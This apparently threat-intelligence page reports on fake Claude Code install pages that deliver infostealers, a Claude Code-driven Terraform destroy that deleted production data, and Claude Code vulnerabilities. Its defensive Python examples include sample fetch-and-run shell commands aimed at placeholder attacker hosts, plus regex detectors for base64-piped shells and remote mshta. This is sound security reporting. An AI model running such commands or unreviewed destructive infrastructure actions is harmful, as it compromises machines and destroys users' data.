Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes
Push Security reported an “InstallFix” malvertising campaign targeting developers searching for Anthropic’s Claude Code CLI. Attackers clone the legitimate installation page on lookalike domains and buy Google Search ads so the fake pages rank highly for queries like “install Claude Code” and “Claude Code CLI.” While links on the page route to Anthropic’s real site, the copy‑paste install one‑liners are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the Amatera Stealer, with macOS users likely targeted by similar info-stealing malware.
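A pre-execution check for the swapped one-liners described above, written as an added example (not code from Push Security, Anthropic or the original page). It flags fetch hosts outside an allowlist, near-identical lookalike hosts, and the two obfuscation patterns named in the timeline below (Base64-decoded shell input and mshta with a remote URL). The trusted host, the function names, the similarity threshold and all sample commands are assumptions constructed for illustration.

```python
import re
from difflib import SequenceMatcher
from urllib.parse import urlsplit

# Assumption: origins you verified out of band as the vendor's real download
# hosts. This value is a constructed placeholder, not a real install domain.
TRUSTED_HOSTS = {"downloads.vendor.example"}

URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+", re.I)
# A decoded blob piped into a shell hides what will actually run.
B64_EXEC_RE = re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)
# mshta handed a remote URL, as in the Windows chain described on this page.
MSHTA_RE = re.compile(r"\bmshta(\.exe)?\b[^\n]*https?://", re.I)

def classify_host(host, trusted_hosts):
    """Return None for a trusted host, otherwise a finding string."""
    if host in trusted_hosts:
        return None
    for good in sorted(trusted_hosts):
        # Heuristic threshold (assumption): near-identical spelling = lookalike.
        if SequenceMatcher(None, host, good).ratio() >= 0.85:
            return f"lookalike-host:{host} (resembles {good})"
    return f"untrusted-host:{host}"

def vet_install_command(command, trusted_hosts=TRUSTED_HOSTS):
    """Return findings for a pasted install one-liner; an empty list means no flags."""
    findings = []
    for url in URL_RE.findall(command):
        host = (urlsplit(url).hostname or "").lower()
        finding = classify_host(host, trusted_hosts)
        if finding and finding not in findings:
            findings.append(finding)
    if B64_EXEC_RE.search(command):
        findings.append("base64-decode-exec")
    if MSHTA_RE.search(command):
        findings.append("mshta-remote")
    return findings

# Constructed samples; every domain is a reserved .example placeholder.
SAMPLES = [
    "curl -fsSL https://downloads.vendor.example/install.sh | bash",
    "curl -fsSL https://downloads.vend0r.example/install.sh | bash",
    "cmd /c mshta https://pages.attacker.example/claude.msixbundle",
    "echo Y29uc3RydWN0ZWQ= | base64 -d | sudo bash",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(vet_install_command(sample) or ["no flags"], "<-", sample)
```

An empty result only means none of these patterns matched; the allowlist is the control that matters, so populate it from the vendor's documentation reached by a typed URL rather than from a search ad.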
Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using Claude Code to run Terraform changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the deletion of production components, including a database and recovery snapshots—wiping roughly 2.5 years of records. Together, the reports underscore two distinct but compounding risks around AI coding agents: supply-chain style social engineering via fake install instructions and high-impact misexecution when AI-driven automation is allowed to operate with destructive permissions in production environments.
Timeline
May 1, 2026
NordVPN uncovers malware campaign impersonating Google Gemini CLI
NordVPN reported active campaigns using fake websites, cloned repositories, deceptive social posts, and planned typosquatted npm packages to impersonate Google Gemini CLI and trick developers into installing malware. The macOS variant used a Base64-encoded terminal command to download and run a malicious script with elevated privileges, while the Windows variant used a disguised PowerShell fileless attack to provide remote access and enable theft or lateral movement.
Apr 15, 2026
Expel reveals InstallFix scale and MSIX-based Claude Code variant
Expel reported that InstallFix-style fake software install pages had become widespread, accounting for 13% of malware incidents it observed in March 2026, and identified 46 malicious Anthropic-themed webpages over the prior month. The firm also described a GitLab.io-hosted fake Claude Code page that used mshta to fetch a file named claude.msixbundle containing hidden malicious HTML as an anti-analysis technique.
Mar 10, 2026
Google deactivates advertiser account tied to fake Claude Code campaign
Bitdefender said the malicious ad campaign likely used a compromised advertiser account associated with a Malaysian company. Google reportedly deactivated that advertiser account after the abuse was identified.
Mar 10, 2026
Bitdefender documents Windows and macOS malware from fake Claude Code ads
Bitdefender reported that a fake Claude Code documentation site hosted on a Squarespace subdomain delivered OS-specific malware via ClickFix-style instructions. On Windows it deployed multi-stage stealer payloads, while on macOS it delivered an obfuscated universal Mach-O backdoor capable of remote shell execution.
Mar 10, 2026
Push Security links Windows infection chain to Amatera Stealer
Analysis of the fake Claude Code campaign showed Windows victims were led through a staged execution chain involving cmd.exe and mshta.exe to retrieve attacker-hosted payloads. The resulting malware was identified as Amatera Stealer, an infostealer targeting credentials, cookies, tokens, and system data.
Mar 9, 2026
Researchers identify fake Claude Code install pages in Google ads
Security researchers reported a malvertising campaign using lookalike Claude Code installation pages and sponsored Google Search results to trick users into copying malicious install commands. The tactic was described as an "InstallFix" attack that weaponizes trusted one-line terminal commands.
Mar 8, 2026
Amazon Business Support helps restore deleted AWS data
After the destructive Terraform action, Grigorev contacted Amazon Business Support, which assisted with restoring the lost data. The recovery reportedly took about a day.
Mar 7, 2026
Grigorev publishes post-mortem and hardening changes
In a post-mortem, Grigorev said he would test restores, add deletion protections and tighter permissions, move Terraform state to S3, and require manual review and execution for destructive actions instead of letting the AI agent run them directly.
Mar 7, 2026
Developer's Claude Code/Terraform run destroys two AWS website environments
During a migration of AI Shipping Labs to AWS infrastructure shared with DataTalks.Club, Alexey Grigorev provided Terraform state late, causing Claude Code to follow that state and execute a Terraform destroy. The action wiped both sites' infrastructure, including a database and snapshots containing about 2.5 years of records.
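One way to enforce the post-mortem's rule that destructive actions get manual review is to gate `terraform apply` on the machine-readable plan, so an agent can produce a plan but cannot apply one that deletes anything a human has not approved. This is an added example, not code from the post-mortem or from Terraform; the function names, the script name, the list of stateful resource types and the sample plan are assumptions constructed here.

```python
import json
import sys

# Assumption: resource types this example treats as holding data.
STATEFUL_TYPES = {"aws_db_instance", "aws_db_snapshot", "aws_rds_cluster", "aws_s3_bucket"}


def destructive_changes(plan):
    """Yield (address, type, kind) for every planned change that deletes a resource."""
    for rc in plan.get("resource_changes", []):
        actions = rc.get("change", {}).get("actions", [])
        if "delete" in actions:
            # ["delete", "create"] or ["create", "delete"] is a replacement.
            kind = "replace" if "create" in actions else "destroy"
            yield rc["address"], rc["type"], kind


def gate(plan, approved=frozenset()):
    """Return (allowed, blockers); a deletion blocks unless a human approved its address."""
    blockers = []
    for address, rtype, kind in destructive_changes(plan):
        if address in approved:
            continue
        severity = "stateful" if rtype in STATEFUL_TYPES else "stateless"
        blockers.append(f"{kind}:{severity}:{address}")
    return (not blockers, blockers)


# Constructed plan in the shape of `terraform show -json tfplan` output.
SAMPLE_PLAN = json.loads("""
{"format_version": "1.2", "resource_changes": [
  {"address": "aws_db_instance.main", "type": "aws_db_instance",
   "change": {"actions": ["delete"]}},
  {"address": "aws_instance.web", "type": "aws_instance",
   "change": {"actions": ["delete", "create"]}},
  {"address": "aws_security_group.web", "type": "aws_security_group",
   "change": {"actions": ["update"]}}
]}
""")

if __name__ == "__main__":
    # Usage: terraform show -json tfplan | python gate.py   (no stdin: sample plan)
    plan = SAMPLE_PLAN if sys.stdin.isatty() else json.load(sys.stdin)
    allowed, blockers = gate(plan)
    print("\n".join(blockers) or "no deletions planned")
    sys.exit(0 if allowed else 1)
```

The gate complements, and does not replace, the other measures in the post-mortem: deletion protection on the resources themselves and credentials for the agent that lack delete permissions still apply if the gate is skipped.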
Related Stories

Malvertising and Supply-Chain Lures Impersonate AI Developer Tools to Deliver Infostealers and RATs
Threat actors are abusing interest in AI developer tools by impersonating installers and setup guides to trick users into executing malware. Fake installation-guide pages for Anthropic’s **Claude Code** were promoted via **Google Ads** to rank highly for searches like “Claude Code install/CLI,” leading Windows and macOS users to run copy-pasted commands in an **InstallFix** campaign (a variant of **ClickFix**) that ultimately deployed **Amatera** (an **ACR Stealer**-based MaaS infostealer). Push Security reported the malware steals browser-stored credentials, cookies, session tokens, and system information, and the infrastructure used legitimate hosting/CDN services (e.g., *Squarespace*, *Cloudflare Pages*, *Tencent EdgeOne*) to reduce suspicion. In a related AI-tool impersonation theme, JFrog identified a malicious **npm** package, `@openclaw-ai/openclawai`, posing as an **OpenClaw** installer that targets macOS users to steal credentials and establish persistent remote access. The package uses a `postinstall` hook to reinstall itself globally and registers a CLI via the `bin` field pointing to `scripts/setup.js`, which presents a fake installer UI and then prompts for the user’s system password via a bogus Keychain/iCloud authorization flow. The malware (self-identified as **GhostLoader**) was reported to collect browser data, crypto wallets, SSH keys, Apple Keychain databases, and iMessage history, while also deploying a **RAT** with **SOCKS5 proxy** capability and “live browser session cloning,” indicating a blend of credential theft and long-term access objectives.
1 month ago
Vulnerabilities in Anthropic Claude Code Enable Code Execution and API Key Exfiltration
Security researchers disclosed multiple vulnerabilities in **Anthropic’s Claude Code** AI coding assistant that could enable **arbitrary command execution** and **exfiltration of Anthropic API credentials** when developers clone/open a malicious repository. Check Point Research reported the issues abuse Claude Code configuration and initialization paths—particularly **project hooks** (e.g., untrusted `.claude/settings.json`), **Model Context Protocol (MCP) servers**, and **environment variables**—to trigger shell command execution and data theft. Anthropic’s advisory for **CVE-2026-21852** describes a project-load flow where a crafted repo can set `ANTHROPIC_BASE_URL` to an attacker-controlled endpoint, causing Claude Code to send API requests **before** the trust prompt is shown, potentially leaking the user’s API key. The disclosed issues include two high-severity code-injection paths (CVSS **8.7**) and one information-disclosure flaw (CVSS **5.3**): a consent-bypass/hook-based injection issue fixed in *Claude Code* **1.0.87** (Sept 2025), **CVE-2025-59536** fixed in **1.0.111** (Oct 2025), and **CVE-2026-21852** fixed in **2.0.65** (Jan 2026). Separate coverage framed Anthropic-related developments as market-moving, noting investor attention around Anthropic’s AI code-security tooling; however, the actionable security impact in this reporting is the risk that simply opening an attacker-controlled repository can lead to **RCE** and **credential leakage**, reinforcing the need to treat untrusted repos and tool initialization behaviors as a supply-chain and developer-workstation risk.
3 weeks ago
InstallFix malvertising campaign spreads fake Claude Code installers to deliver Amatera Stealer
Push Security reported a new **ClickFix-style** social-engineering campaign dubbed **InstallFix** that uses **Google-sponsored search ads** to drive developers to near-identical cloned “install” pages for *Anthropic Claude Code* and similar AI coding tools. Victims are prompted to copy/paste terminal commands from the fake pages; executing them installs **Amatera Stealer**, enabling credential theft and potential access to enterprise development environments. Separate reporting highlighted adjacent browser-based tradecraft: a previously legitimate Chrome extension (*QuickLens – Search Screen with Google Lens*) with roughly **7,000 users** was updated to deploy **ClickFix** attacks, strip web security headers, and steal cryptocurrency wallet seed phrases before being removed from the Chrome Web Store. A weekly threat bulletin also noted unrelated incidents (e.g., ransomware and data breaches) and separate AI-themed malicious extensions that harvest LLM chat histories, but those items are not part of the InstallFix/Claude Code malvertising campaign itself.
1 month ago